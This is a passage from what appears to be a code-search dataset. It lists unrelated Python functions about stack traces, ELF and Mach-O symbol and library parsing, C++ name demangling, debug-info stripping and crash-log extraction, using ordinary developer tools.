sample_fraction=0.9),\n stacktrace.FunctionLine(line=511, sample_fraction=0.1)))\n stack_frame1 = stacktrace.ProfilerStackFrame(\n 1, 0.2, 6.1, False, 'chrome', 'MainDllLoader::Launch(HINSTANCE__ *)',\n 'app/main_dll_loader_win.cc', 'chrome/app/main_dll_loader_win.cc',\n 'https://repo', 117, None)\n frames0 = (stack_frame0, stack_frame1)\n\n stack_frame2 = stacktrace.ProfilerStackFrame(\n 0, 0.3, float('inf'), False, 'chrome', 'wWinMain',\n 'app/chrome_exe_main_win.cc', 'chrome/app/chrome_exe_main_win.cc',\n 'https://repo', 484, None)\n frames1 = (stack_frame2,)\n\n call_stack0 = stacktrace.CallStack(0, frames0,\n stacktrace.CallStackFormatType.DEFAULT,\n stacktrace.LanguageType.CPP)\n call_stack1 = stacktrace.CallStack(0, frames1,\n stacktrace.CallStackFormatType.DEFAULT,\n stacktrace.LanguageType.CPP)\n stacks = (call_stack0, call_stack1)\n expected_stacktrace = stacktrace.Stacktrace(stacks, call_stack0)\n\n self._VerifyTwoStackFramesEqual(actual_stack_trace.stacks[0].frames[0],\n stack_frame0)\n self._VerifyTwoStacktracesEqual(actual_stack_trace, expected_stacktrace)", "def _getImports_ldd(pth):\n rslt = set()\n if is_aix:\n # Match libs of the form\n # 'archivelib.a(objectmember.so/.o)'\n # or\n # 'sharedlib.so'\n # Will not match the fake lib '/unix'\n lddPattern = re.compile(r\"^\\s*(((?P<libarchive>(.*\\.a))(?P<objectmember>\\(.*\\)))|((?P<libshared>(.*\\.so))))$\")\n elif is_hpux:\n # Match libs of the form\n # 'sharedlib.so => full-path-to-lib\n # e.g.\n # 'libpython2.7.so => /usr/local/lib/hpux32/libpython2.7.so'\n lddPattern = re.compile(r\"^\\s+(.*)\\s+=>\\s+(.*)$\")\n elif is_solar:\n # Match libs of the form\n # 'sharedlib.so => full-path-to-lib\n # e.g.\n # 'libpython2.7.so.1.0 => /usr/local/lib/libpython2.7.so.1.0'\n # Will not match the platform specific libs starting with '/platform'\n lddPattern = re.compile(r\"^\\s+(.*)\\s+=>\\s+(.*)$\")\n else:\n lddPattern = re.compile(r\"\\s*(.*?)\\s+=>\\s+(.*?)\\s+\\(.*\\)\")\n\n for line in compat.exec_command('ldd', pth).splitlines():\n m = lddPattern.search(line)\n if m:\n if is_aix:\n libarchive = m.group('libarchive')\n if libarchive:\n # We matched an archive lib with a request for a particular\n # embedded shared object.\n # 'archivelib.a(objectmember.so/.o)'\n lib = libarchive\n name = os.path.basename(lib) + m.group('objectmember')\n else:\n # We matched a stand-alone shared library.\n # 'sharedlib.so'\n lib = m.group('libshared')\n name = os.path.basename(lib)\n elif is_hpux:\n name, lib = m.group(1), m.group(2)\n else:\n name, lib = m.group(1), m.group(2)\n if name[:10] in ('linux-gate', 'linux-vdso'):\n # linux-gate is a fake library which does not exist and\n # should be ignored. See also:\n # http://www.trilithium.com/johan/2005/08/linux-gate/\n continue\n\n if os.path.exists(lib):\n # Add lib if it is not already found.\n if lib not in rslt:\n rslt.add(lib)\n else:\n logger.error('Can not find %s in path %s (needed by %s)',\n name, lib, pth)\n return rslt", "def test_GetSymbolMapping_simple_match(self):\n lines = [\"This is a test case\\n\", \"Caching all mojo apps\",\n \"I/mojo(2): [INFO:somefile.cc(85)] Caching mojo app \"\n \"https://apps.mojo/myapp.mojo at /path/to/myapp.mojo/.lM03ws\"]\n golden_dict = {\n \"/path/to/myapp.mojo/.lM03ws\": \"libmyapp_library.so\"\n }\n actual_dict = stack_utils.GetSymbolMapping(lines)\n self.assertDictEqual(golden_dict, actual_dict)", "def DumpSymbols(lib_path, dump_path):\n elf_parser = ExternalModules.elf_parser\n parser = None\n try:\n parser = elf_parser.ElfParser(lib_path)\n symbols = parser.ListGlobalDynamicSymbols()\n finally:\n if parser:\n parser.Close()\n if not symbols:\n return \"No symbols\"\n symbols.sort()\n with open(dump_path, \"w\") as dump_file:\n dump_file.write(\"\\n\".join(symbols) + \"\\n\")\n return \"Output: \" + dump_path", "def get_dlls(comments):\n dlls = [line for line in comments if '.dll' in line.lower()]\n return list(set(line.split()[-1].lower() for line in dlls))", "def get_symbols(obj_path):\n cmd = ['nm', obj_path]\n res = subprocess.run(cmd, stdout=subprocess.PIPE,\n stderr=subprocess.PIPE, check=True)\n\n return res.stdout.decode()", "def _filter_stack(\n stack: List[traceback.FrameSummary],\n) -> List[traceback.FrameSummary]:\n # strip the task factory frame in the vanilla event loop\n if (\n stack[-1].filename.endswith(\"asyncio/base_events.py\")\n and stack[-1].name == \"create_task\"\n ):\n stack = stack[:-1]\n # strip the loop.create_task frame\n if (\n stack[-1].filename.endswith(\"asyncio/tasks.py\")\n and stack[-1].name == \"create_task\"\n ):\n stack = stack[:-1]\n _cut_idx = 0\n for _cut_idx, f in reversed(list(enumerate(stack))):\n # uvloop\n if f.filename.endswith(\"asyncio/runners.py\") and f.name == \"run\":\n break\n # vanilla\n if f.filename.endswith(\"asyncio/events.py\") and f.name == \"_run\":\n break\n return stack[_cut_idx + 1 :]", "def _extract_r_remove_package_names(log):\n start = \"remove.packages(c(\"\n i_start = log.find(start) + len(start)\n i_end = log.find(\")\", i_start)\n package_names = [name.strip('\"') for name in log[i_start:i_end].split(\",\")]\n return package_names", "def test_GetSymbolMapping_multiple_match(self):\n lines = [\"This is a test case\\n\", \"Caching all mojo apps\",\n \"I/mojo(2): [INFO:somefile.cc(85)] Caching mojo app \"\n \"https://apps.mojo/myapp.mojo at /path/to/myapp.mojo/.lM03ws\",\n \"I/mojo(2): [INFO:somefile.cc(85)] Caching mojo app \"\n \"https://apps.mojo/otherapp.mojo at /path/to/otherapp.mojo/.kW07s\"]\n golden_dict = {\n \"/path/to/myapp.mojo/.lM03ws\": \"libmyapp_library.so\",\n \"/path/to/otherapp.mojo/.kW07s\": \"libotherapp_library.so\"\n }\n actual_dict = stack_utils.GetSymbolMapping(lines)\n self.assertDictEqual(golden_dict, actual_dict)", "def extract_function_name(maybe_function_str: str) -> Optional[str]:\n match = STACK_TRACE_LINE_RE.search(maybe_function_str)\n if match is not None:\n return match.group(2)\n return None", "def analyze_source(source, prefix):\n symbolre = re.compile(r\"[\\s:;&\\|\\<\\>\\=\\^\\+\\-\\*/\\(\\)\\?]\" + prefix + \"([a-zA-Z0-9_]+)[\\s\\(]\")\n results = symbolre.findall(source, re.MULTILINE)\n ret = set()\n for ii in results:\n symbolset = set()\n symbolset.add(ii)\n ret = ret.union(symbolset)\n return ret", "def get_search_keywords(testcase):\n crash_state_lines = testcase.crash_state.splitlines()\n # Use top 2 frames for searching.\n return crash_state_lines[:2]", "def fix_mangled_includes(ln):\n m = proginput_re.search(ln)\n if m:\n fn = m.group(1)\n dName = os.path.dirname(fn)\n fName = os.path.basename(fn)\n for fn2 in os.listdir(dName):\n if fn2.replace(\"_\",\"\") == fName:\n ln = \"\\\\programinput{\" + os.path.join(dName,fn2) + \"}\\n\"\n break\n return ln", "def get_paths_containing_string_in_threadstack(target_str, stack_context=2):\n frames = []\n list_of_frames = [\n get_paths_containing_string_in_locals(target_str,\n val.frame.f_locals,\n locals_dict_ref_str=\"[get_paths_containing_string_in_locals(target_str, val.frame.f_locals) for idx, \"\n \"val in enumerate(inspect.getouterframes(inspect.currentframe(), \"\n \"2)) if \\\"pydev\\\" not in val.filename]\")\n for idx, val in enumerate(inspect.getouterframes(inspect.currentframe(), stack_context))\n if \"pydev\" not in val.filename]\n\n for x in list_of_frames:\n for y in x:\n frames.append(y)\n return frames", "def resolve_addresses(trace, progname, depth):\n platform = sys.platform\n for i in trace:\n for stkaddr in i[\"stack\"][-depth:]:\n if stkaddr not in Cheaper.stack_info:\n if platform == \"darwin\":\n result = str(stkaddr) # FIXME symbolication still not working\n if False:\n result = subprocess.run(\n [\"atos\", \"-o\", progname, hex(stkaddr)],\n stdout=subprocess.PIPE,\n )\n else:\n result = subprocess.run(\n [\"addr2line\", hex(stkaddr), \"-C\", \"-e\", progname],\n stdout=subprocess.PIPE,\n )\n if platform == \"darwin\":\n # Using stdout currently disabled\n Cheaper.stack_info[stkaddr] = result\n else:\n Cheaper.stack_info[stkaddr] = result.stdout.decode(\"utf-8\").strip()\n # If it failed to resolve symbols, use the address instead\n if \"?\" in Cheaper.stack_info[stkaddr]:\n Cheaper.stack_info[stkaddr] = \"CHEAPERBAD \" + str(hex(stkaddr))", "def get_name_with_lib(datablock):\r\n text = datablock.name\r\n if datablock.library:\r\n # text += ' (Lib: \"%s\")' % datablock.library.name\r\n text = \"L \" + text\r\n return text", "def fixer_func(dlls):\n if type(dlls) is str:\n return ';'.join(sorted(set(dlls.split(';'))))\n return dlls", "def extract(self, lib):\n cmd = [self.tool] + self.flags + [lib]\n out = subprocess.check_output(cmd).decode()\n loader_syms = self.get_loader_symbol_table(out)\n return self.process_syms(loader_syms)", "def getMangledName(self, name, module=None):\n if module is os.path:\n return \"os.path\"\n if isinstance(name, str) and (name.startswith(self.start) or name == self.package):\n return self.prefix + name\n return name", "def extract_symbol_names_from_target(subast) -> list:\n # initialise an empty list of the symbol names\n symbol_names = []\n # walk the target object to look for ast.Name instances\n for walked_ast in ast.walk(subast):\n if type(walked_ast) is ast.Name:\n symbol_names.append(walked_ast.id)\n return symbol_names", "def split_debug(src, objcopy=None, objdump=None):\n if objcopy is None:\n objcopy = \"objcopy\"\n if objdump is None:\n objdump = \"objdump\"\n if not contains_debug_info(src, objdump=objdump):\n ui.info(\"-- Already stripped\", src)\n return\n src_stat = os.stat(src)\n dirname, basename = os.path.split(src)\n debug_dir = os.path.join(dirname, \".debug\")\n qisys.sh.mkdir(debug_dir)\n dest = os.path.join(src, debug_dir, basename)\n to_run = list()\n to_run.append([objcopy, \"--only-keep-debug\", src, dest])\n to_run.append([objcopy,\n \"--strip-debug\",\n \"--strip-unneeded\",\n \"--add-gnu-debuglink=%s\" % dest,\n src])\n try:\n for cmd in to_run:\n qisys.command.check_output(cmd, stderr=subprocess.STDOUT)\n ui.info(\"-- Debug info extracted for\", src)\n except qisys.command.CommandFailedException as e:\n ui.error(\"Error while Extracting package debug for %s\" % src)\n ui.error(str(e))\n # After the commands have run, utime of the file has changed, causing\n # cmake to re-install the libraries. Which is not cool ...\n # So set back mtime to its previous value:\n os.utime(src, (src_stat.st_atime, src_stat.st_mtime))", "def find_backtrace(self):\n return [ft for ft in os.listdir(self.output_dir)\n if os.path.isfile(ft) and ft.startswith(\"Backtrace.\")]", "def get_crash_dumps_path(self):\n\t\treturn call_sdk_function('PrlApi_GetCrashDumpsPath')", "def extract_censored_tb(tb, limit=None):\n # [3:] drops the top frames (which are Halp internals).\n items = traceback.extract_tb(tb, limit)[3:]\n if items and current_line_number:\n # The top item came from a '## ' line; fix its line number:\n filename, lineno, func_name, text = items[0]\n if filename == '<string>' and lineno == 1: # (should always be true)\n items[0] = filename, current_line_number, func_name, None\n return items", "def generate_dependencies(data, mib_name):\r\n if mib_name not in mib_dependency_map:\r\n mib_dependency_map[mib_name] = []\r\n imports_section_search = re.search('IMPORTS(?P<imports_section>.*?);', data, re.DOTALL)\r\n if imports_section_search:\r\n imports_section = imports_section_search.group('imports_section')\r\n for dependency in re.finditer('FROM (?P<mib_name>[\\w-]+)', imports_section):\r\n dependency_name = dependency.group('mib_name')\r\n if dependency_name not in mib_dependency_map:\r\n mib_dependency_map[dependency_name] = []\r\n mib_dependency_map[mib_name].append(dependency_name)", "def DumpStackTracebacks():\n results = []\n id_name_map = {}\n for thread in threading.enumerate():\n id_name_map[thread.ident] = thread.name\n\n results.append(\n '*****\\n'\n '*\\n'\n '* Dumping debug information.\\n'\n '*\\n'\n '*****\\n')\n # pylint: disable=protected-access\n for thread_id, stack in sys._current_frames().items():\n results.append('Thread %s (id=%d):\\n' %\n (id_name_map.get(thread_id, 'unnamed-%d' % thread_id),\n thread_id))\n for filename, line_no, function_name, text in (\n traceback.extract_stack(stack)):\n # Same format as the usual Python stack trace, but indented\n # twice\n results.append(' File: \"%s\", line %d, in %s\\n' % (\n filename, line_no, function_name))\n if text:\n results.append(' %s\\n' % text.strip())\n\n results.append('***** End of debug information.\\n')\n\n return ''.join(results)", "def extract(self, lib):\n cmd = [self.tool] + self.flags + [lib]\n out = subprocess.check_output(cmd).decode()\n dyn_syms = self.get_dynsym_table(out)\n return self.process_syms(dyn_syms)", "def xspace_to_tool_names(xspace_paths):\n raw_data, success = _pywrap_profiler.xspace_to_tools_data(\n xspace_paths, 'tool_names')\n if success:\n return [tool + '^' for tool in raw_data.decode().split(',')]\n return []", "def find_link_references(bytecode, full_reference_names):\n unprefixed_bytecode = remove_0x_prefix(bytecode)\n\n expand_fn = functools.partial(\n expand_shortened_reference_name,\n full_reference_names=full_reference_names,\n )\n\n link_references = tuple((\n LinkReference(\n reference_name=remove_dunderscore_wrapper(match.group()),\n full_name=expand_fn(remove_dunderscore_wrapper(match.group())),\n offset=match.start(),\n length=match.end() - match.start(),\n ) for match in re.finditer(DEPENDENCY_RE, unprefixed_bytecode)\n ))\n\n return link_references", "def extractStack(frame, context=10, exceptionsFrameSymbol=EXCEPTIONS_FRAME_SYMBOL):\n\n\tstack = []\n\n\tfor frame, fileName, lineNumber, name, context, index in inspect.getouterframes(frame, context):\n\t\tif frame.f_locals.get(exceptionsFrameSymbol):\n\t\t\tcontinue\n\n\t\tstack.append((frame,\n\t\t\t\t\tfileName,\n\t\t\t\t\tlineNumber,\n\t\t\t\t\tname, context\n\t\t\t\t\tif context is not None else [],\n\t\t\t\t\tindex if index is not None else -1))\n\n\treturn list(reversed(stack))", "def format_backtrace(trace):\n backtrace = []\n for filename, line, func, _ in traceback.extract_tb(trace):\n desc = {'file': filename,\n 'line': line,\n 'function': func,\n 'text': _}\n backtrace.append(desc)\n return backtrace", "def extract_gcc_binaries():\n patterns = [\n \"/opt/local/bin/g++-mp-[0-9]*.[0-9]*\",\n \"/opt/local/bin/g++-mp-[0-9]*\",\n \"/usr/local/bin/g++-[0-9]*.[0-9]*\",\n \"/usr/local/bin/g++-[0-9]*\",\n ]\n if platform.system() == \"Darwin\":\n gcc_binaries = []\n for pattern in patterns:\n gcc_binaries += glob.glob(pattern)\n gcc_binaries.sort()\n if gcc_binaries:\n _, gcc = os.path.split(gcc_binaries[-1])\n return gcc\n else:\n return None\n else:\n return None", "def get_binary_name():\n return os.path.basename(inspect.stack()[-1][1])[:16]", "def get_keyword(package):\n\ttry:\n\t\tsubstr = re.search(r'(\\S+)_(\\S+)', package)\n\t\tif substr:\n\t\t\treturn substr.groups()\n\texcept Exception,e:\n\t\tlog.error(str(e))\n\t\treturn None", "def libraries(self):\n\n status, stdout, stderr = self.__xcall__(['--libs-only-l'])\n\n if status != 0:\n raise RuntimeError(\"error querying --libs-only-l for package `%s': %s\" % (self.name, stderr))\n\n retval = []\n for token in stdout.split():\n retval.append(token[2:])\n\n return uniq(retval)", "def extract_stack_trace_logs(\n self, log_lines: List[str], application: str\n ) -> List[str]:\n\n # Search for the known crash/stack file marker\n LOG.debug(f\"Extracting crash stack traces from {application} log\")\n for idx, log in enumerate(log_lines):\n # This marker is only present in non-VPP application logs. VPP has its own CrashAnalyzer.\n if STACK_TRACE_CONTENT_MARKER in log:\n # Strip away whitespace markers inserted for multi-line logs\n stack_lines = [line.lstrip() for line in log_lines[idx].splitlines()]\n LOG.info(\n f\"Found stack trace in {application} log with {len(stack_lines)} lines\"\n )\n return stack_lines\n\n return []", "def _ScanLibDirs(self, dump_zip, dump_paths, lib_dirs, dump_version):\n error_list = []\n lib_paths = dict()\n for lib_dir in lib_dirs:\n for parent_dir, dir_names, lib_names in os.walk(lib_dir):\n for lib_name in lib_names:\n if lib_name not in lib_paths:\n lib_paths[lib_name] = os.path.join(parent_dir,\n lib_name)\n for lib_name, dump_path in dump_paths.items():\n if lib_name not in lib_paths:\n logging.info(\"%s: Not found on target\", lib_name)\n continue\n lib_path = lib_paths[lib_name]\n rel_path = os.path.relpath(lib_path, self._temp_dir)\n\n has_exception = False\n missing_symbols = []\n vtable_diff = []\n\n try:\n with dump_zip.open(dump_path, \"r\") as dump_file:\n dump_obj = json.load(dump_file)\n with vtable_dumper.VtableDumper(lib_path) as dumper:\n missing_symbols = self._DiffElfSymbols(\n dump_obj, dumper)\n vtable_diff = self._DiffVtableComponents(\n dump_obj, dumper)\n except (IOError,\n elf_parser.ElfError,\n vtable_dumper.VtableError) as e:\n logging.exception(\"%s: Cannot diff ABI\", rel_path)\n has_exception = True\n\n if missing_symbols:\n logging.error(\"%s: Missing Symbols:\\n%s\",\n rel_path, \"\\n\".join(missing_symbols))\n if vtable_diff:\n logging.error(\"%s: Vtable Difference:\\n\"\n \"vtable offset expected actual\\n%s\",\n rel_path,\n \"\\n\".join(\" \".join(e) for e in vtable_diff))\n if (has_exception or missing_symbols or vtable_diff):\n error_list.append(rel_path)\n else:\n logging.info(\"%s: Pass\", rel_path)\n return error_list", "def parse_symbol_table(data, sections, elf_header):\n if is64bit(elf_header):\n symbol_entry_str = symbol_64_entry_str\n symbol_entry_spec = symbol_64_entry_spec\n else:\n symbol_entry_str = symbol_32_entry_str\n symbol_entry_spec = symbol_32_entry_spec\n entry_len = struct.calcsize(symbol_entry_str)\n \n st_offset = None\n if \".symtab\" in sections:\n section = \".symtab\"\n if \".strtab\" in sections:\n st_offset = sections[\".strtab\"][\"offset\"]\n else:\n st_offset = sections[section][\"offset\"]\n \n elif \".dynsym\" in sections:\n section = \".dynsym\"\n if \".dynstr\" in sections:\n st_offset = sections[\".dynstr\"][\"offset\"]\n else:\n st_offset = sections[section][\"offset\"]\n \n \n if section not in sections:\n return {}, {} \n \n symbols = {}\n imports = {}\n offset = sections[section][\"offset\"]\n size = sections[section][\"size\"]\n index = offset\n while index < offset + size:\n vals = {}\n if len(data) < index+entry_len: \n break\n \n val_data = struct.unpack(symbol_entry_str, data[index:index+entry_len])\n for i, elem in enumerate(symbol_entry_spec):\n vals[elem[0]] = val_data[i]\n \n if st_offset is None:\n symbols[vals[\"name\"]] = vals\n else:\n func_name = get_name_from_string_table(data, st_offset, vals[\"name\"])\n if func_name:\n vals.pop(\"name\")\n vals[\"info\"] = get_symbol_info(vals[\"info\"])\n vals[\"shndx\"] = get_symbol_shndx(vals[\"shndx\"])\n \n if vals[\"info\"] == \"UNDEFINED\" and vals[\"value\"] == 0:\n tmp_name = func_name\n import_name = \"Unknown\"\n if \"@@\" in func_name:\n i = tmp_name.find(\"@@\")\n func_name = tmp_name[:i]\n import_name = tmp_name[i:].strip(\"@@\") \n if import_name not in imports:\n imports[import_name] = {}\n imports[import_name][func_name] = vals\n symbols[func_name] = vals\n \n index += entry_len \n \n return symbols, imports", "def print_debug_imports(self):\n for dbgImp in self.rt_import_table:\n (module_name, ea, name, ord) = self.rt_import_table[dbgImp]\n idaapi.msg(\"ModuleName - %s,\\t\\tFunctionName - %s,\\t\\t Address in IAT - %s,\\t\\t Real address - %s\\n\" %\n (module_name, name, hex(ea), hex(dbgImp)))", "def test_GetSymbolMapping_parameter_match(self):\n lines = [\"This is a test case\\n\", \"Caching all mojo apps\",\n \"I/mojo(2): [INFO:somefile.cc(85)] Caching mojo app \"\n \"https://apps.mojo/myapp.mojo?q=hello at /path/to/myapp.mojo/.lM03ws\"]\n golden_dict = {\n \"/path/to/myapp.mojo/.lM03ws\": \"libmyapp_library.so\"\n }\n actual_dict = stack_utils.GetSymbolMapping(lines)\n self.assertDictEqual(golden_dict, actual_dict)", "def unsafe_get_stack_versions():\n stack_selector_path = stack_tools.get_stack_tool_path(stack_tools.STACK_SELECTOR_NAME)\n code, out = call((STACK_SELECT_PREFIX, stack_selector_path, 'versions'))\n versions = []\n if 0 == code:\n for line in out.splitlines():\n versions.append(line.rstrip('\\n'))\n return (code, out, versions)", "def _getImports_macholib(pth):\n from macholib.MachO import MachO\n from macholib.mach_o import LC_RPATH\n from macholib.dyld import dyld_find\n rslt = set()\n seen = set() # Libraries read from binary headers.\n\n ## Walk through mach binary headers.\n\n m = MachO(pth)\n for header in m.headers:\n for idx, name, lib in header.walkRelocatables():\n # Sometimes some libraries are present multiple times.\n if lib not in seen:\n seen.add(lib)\n\n # Walk through mach binary headers and look for LC_RPATH.\n # macholib can't handle @rpath. LC_RPATH has to be read\n # from the MachO header.\n # TODO Do we need to remove LC_RPATH from MachO load commands?\n # Will it cause any harm to leave them untouched?\n # Removing LC_RPATH should be implemented when getting\n # files from the bincache if it is necessary.\n run_paths = set()\n for header in m.headers:\n for command in header.commands:\n # A command is a tupple like:\n # (<macholib.mach_o.load_command object at 0x>,\n # <macholib.mach_o.rpath_command object at 0x>,\n # '../lib\\x00\\x00')\n cmd_type = command[0].cmd\n if cmd_type == LC_RPATH:\n rpath = command[2].decode('utf-8')\n # Remove trailing '\\x00' characters.\n # e.g. '../lib\\x00\\x00'\n rpath = rpath.rstrip('\\x00')\n # Replace the @executable_path and @loader_path keywords\n # with the actual path to the binary.\n executable_path = os.path.dirname(pth)\n rpath = re.sub('^@(executable_path|loader_path|rpath)(/|$)',\n executable_path + r'\\2', rpath)\n # Make rpath absolute. According to Apple doc LC_RPATH\n # is always relative to the binary location.\n rpath = os.path.normpath(os.path.join(executable_path, rpath))\n run_paths.update([rpath])\n else:\n # Frameworks that have this structure Name.framework/Versions/N/Name\n # need to to search at the same level as the framework dir.\n # This is specifically needed so that the QtWebEngine dependencies\n # can be found.\n if '.framework' in pth:\n run_paths.update(['../../../'])\n\n # for distributions like Anaconda, all of the dylibs are stored in the lib directory\n # of the Python distribution, not alongside of the .so's in each module's subdirectory.\n run_paths.add(os.path.join(base_prefix, 'lib'))\n\n ## Try to find files in file system.\n\n # In cases with @loader_path or @executable_path\n # try to look in the same directory as the checked binary is.\n # This seems to work in most cases.\n exec_path = os.path.abspath(os.path.dirname(pth))\n\n\n for lib in seen:\n\n # Suppose that @rpath is not used for system libraries and\n # using macholib can be avoided.\n # macholib can't handle @rpath.\n if lib.startswith('@rpath'):\n lib = lib.replace('@rpath', '.') # Make path relative.\n final_lib = None # Absolute path to existing lib on disk.\n # Try multiple locations.\n for run_path in run_paths:\n # @rpath may contain relative value. Use exec_path as\n # base path.\n if not os.path.isabs(run_path):\n run_path = os.path.join(exec_path, run_path)\n # Stop looking for lib when found in first location.\n if os.path.exists(os.path.join(run_path, lib)):\n final_lib = os.path.abspath(os.path.join(run_path, lib))\n rslt.add(final_lib)\n break\n # Log error if no existing file found.\n if not final_lib:\n logger.error('Can not find path %s (needed by %s)', lib, pth)\n\n # Macholib has to be used to get absolute path to libraries.\n else:\n # macholib can't handle @loader_path. It has to be\n # handled the same way as @executable_path.\n # It is also replaced by 'exec_path'.\n if lib.startswith('@loader_path'):\n lib = lib.replace('@loader_path', '@executable_path')\n try:\n lib = dyld_find(lib, executable_path=exec_path)\n rslt.add(lib)\n except ValueError:\n logger.error('Can not find path %s (needed by %s)', lib, pth)\n\n return rslt", "def _extract_conda_remove_package_names(log):\n names = log.split(\"--name\")[-1].split()\n return names[1:]", "def extract_function_name():\n tb = sys.exc_info()[-1]\n stk = traceback.extract_tb(tb, 1)\n fname = stk[0][3]\n return fname", "def load_stack_top_into_d():\n return ['@SP', 'A=M', 'D=M']", "def remove_unc(array):\r\n\tnew_arr = []\r\n\r\n\tdef checkForNewLineAndSemiColon(string):\r\n\t\t\"\"\"delete the new-line character and semi-colon from the string\"\"\"\r\n\t\tnew_string = \"\"\r\n\t\tfor i in string:\r\n\t\t\tif i != \"\\n\" and i != \";\":\r\n\t\t\t\tnew_string += i\r\n\t\treturn new_string\r\n\r\n\tfor i in range(len(array)):\r\n\t\tif array[i] != '' and array[i] != \"package\":\r\n\t\t\tnew_arr.append(checkForNewLineAndSemiColon(array[i]))\r\n\r\n\treturn new_arr[0]", "def find_actual_caller(self):\n\n # Gleaned from code in the logging module itself...\n try:\n f = sys._getframe(1)\n ##f = inspect.currentframe(1)\n except Exception:\n f = None\n # On some versions of IronPython, currentframe() returns None if\n # IronPython isn't run with -X:Frames.\n if f is not None:\n f = f.f_back\n rv = \"(unknown module)\", \"(unknown file)\", 0, \"(unknown function)\"\n while hasattr(f, \"f_code\"):\n co = f.f_code\n filename = os.path.normcase(co.co_filename)\n mod = inspect.getmodule(f)\n\n if mod is None:\n modname = '__main__'\n else:\n modname = mod.__name__\n\n if modname == __name__:\n # Crawl back until the first frame outside of this module\n f = f.f_back\n continue\n\n rv = (modname, filename, f.f_lineno, co.co_name)\n break\n return rv", "def identify_cut(filenames):\n lib_string = \"lib/python\"\n lib_started = False\n for index, filename in enumerate(filenames):\n if not lib_started and lib_string in filename:\n lib_started = True\n if lib_started and lib_string not in filename:\n return index", "def getLibs(env, categories=\"main\"):\n libs = []\n removeSelf = False\n for category in categories.split():\n if category == \"self\":\n category = \"main\"\n removeSelf = True\n for lib in env.libs[category]:\n if lib not in libs:\n libs.append(lib)\n if removeSelf:\n try:\n libs.remove(env[\"packageName\"])\n except ValueError:\n pass\n return libs", "def local_register():\n for text in bpy.data.texts:\n if text.use_module:\n name = text.name\n if name.endswith(\".py\"):\n try:\n __import__(name[:-3])\n except:\n import traceback\n traceback.print_exc()", "def caller_info(self):\n\n frames = traceback.extract_stack()\n frames.reverse()\n try:\n (_, mod_name) = __name__.rsplit('.', 1)\n except ValueError:\n mod_name = __name__\n for (fpath, lnum, _, _) in frames:\n (fname, _) = os.path.basename(fpath).rsplit('.', 1)\n if fname != mod_name:\n break\n\n return (fname, lnum)", "def demangled_name(self):\n # make sure it's mangled\n if self.name.startswith(\"_Z\"):\n name = self.name\n if '@@' in self.name:\n name = self.name.split(\"@@\")[0]\n args = ['c++filt']\n args.append(name)\n pipe = subprocess.Popen(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE)\n stdout, _ = pipe.communicate()\n demangled = stdout.split(\"\\n\")\n\n if len(demangled) > 0:\n return demangled[0]\n\n return None", "def getExtraDlls(self, module):\n\n full_name = module.getFullName()\n\n if full_name == \"kivy\":\n kivy_info = self._getKivyInformation()\n\n kivy_dlls = []\n for dll_folder in kivy_info.sdl2_dep_bins + kivy_info.glew_dep_bins:\n kivy_dlls.extend(self.locateDLLsInDirectory(dll_folder))\n\n for full_path, target_filename, _dll_extension in kivy_dlls:\n yield self.makeDllEntryPoint(\n source_path=full_path,\n dest_path=target_filename,\n package_name=full_name,\n reason=\"needed by 'kivy'\",\n )\n\n self.reportFileCount(full_name, len(kivy_dlls))", "def extract_compile_reports(events):\n result = []\n for e in events:\n evt = IpuTraceEvent.FromString(e)\n if evt.type == IpuTraceEvent.COMPILE_END:\n try:\n module = evt.compile_end.module_name.decode('utf-8')\n rep = evt.compile_end.compilation_report.decode('utf-8')\n if len(rep) > 0:\n result += [(module, rep)]\n except UnicodeDecodeError:\n pass\n return result", "def get_all_d_module_info():\n a_local_var = 'this is local variable'\n zzz = 5", "def ParseVMSymbols(self, filename, start, end):\n pipe = os.popen('nm -n %s | c++filt' % filename, 'r')\n try:\n for line in pipe:\n row = re.match('^([0-9a-fA-F]{8}) . (.*)$', line)\n if row:\n addr = int(row.group(1), 16)\n if addr < start and addr < end - start:\n addr += start\n self.cpp_entries.Insert(addr, tickprocessor.CodeEntry(addr, row.group(2)))\n finally:\n pipe.close()", "def decode_cpp_function_names(self) -> None:\n with Popen(['c++filt'], stdin=PIPE, stdout=PIPE, universal_newlines=True) as proc:\n for func in self.source_functions:\n proc.stdin.write(func.name + '\\n')\n proc.stdin.flush()\n func.pretty_name = proc.stdout.readline().rstrip('\\n\\r')", "def getExcludedDumpRegisterNames(self):\n pass", "def findCallerPatch():\n f = currentframe()\n #On some versions of IronPython, currentframe() returns None if\n #IronPython isn't run with -X:Frames.\n if f is not None:\n f = f.f_back\n rv = \"(unknown file)\", 0, \"(unknown function)\"\n while hasattr(f, \"f_code\"):\n co = f.f_code\n filename = os.path.normcase(co.co_filename)\n if filename == _srcfile:\n f = f.f_back\n continue\n rv = (filename, f.f_lineno, co.co_name)\n break\n return rv", "def extractReservedWords(code):\n reserved_words=[] #https://realpython.com/lessons/reserved-keywords/5646\n code = str(code).replace(\"\\n\", \"\")\n for c in code.split(\" \"): \n if keyword.iskeyword(c): \n reserved_words.append(c) \n str1= \" \"\n return (str1.join(reserved_words))", "def GetDefineGuardSymbol(file_name):\n return os.path.basename(file_name).upper().replace('.', '_')", "def compilation_test(interp, source):\r\n print '*** Compiling symbols from file: %s ***' % util.within_VCode(source)\r\n interp.cleanup_dictionary()\r\n interp.parse_symbols_from_file(source)\r\n print '\\n\\nParsed symbols are: '\r\n interp.print_symbols()\r\n print 'Unresolved abbreviations are:'\r\n unresolved = interp.peek_at_unresolved()\r\n sorted_unresolved = unresolved.keys()\r\n sorted_unresolved.sort()\r\n for an_abbreviation in sorted_unresolved:\r\n symbol_list = unresolved[an_abbreviation].keys()\r\n symbol_list.sort()\r\n print '\\'%s\\': appears in %s' % (an_abbreviation, str(symbol_list))\r\n \r\n print '\\n*** End of compilation test ***\\n'", "def get_package_list():\n pip_freeze = subprocess.check_output(('pip', 'freeze')).decode('utf8')\n package_list = [x.strip().split('==') for x in pip_freeze.split('\\n') if x.find('==') != -1]\n package_list = [(x[0].lower(), x[1]) for x in package_list]\n return package_list", "def extract_all_strings_from_event_trace(events):\n result = \"\"\n for e in events:\n evt = IpuTraceEvent.FromString(e)\n\n result = result + (\"-\" * 70) + \"\\n=> @ \" + \\\n time.strftime('%F %T %z', time.localtime(evt.timestamp)) + \": \"\n\n if evt.type == IpuTraceEvent.COMPILE_BEGIN:\n evt_str = \"Compile begin: \" + \\\n evt.compile_begin.module_name.decode('utf-8') + \"\\n\"\n elif evt.type == IpuTraceEvent.COMPILE_END:\n evt_str = \"Compile end: \" + \\\n evt.compile_end.module_name.decode('utf-8') + \"\\n\" + \\\n 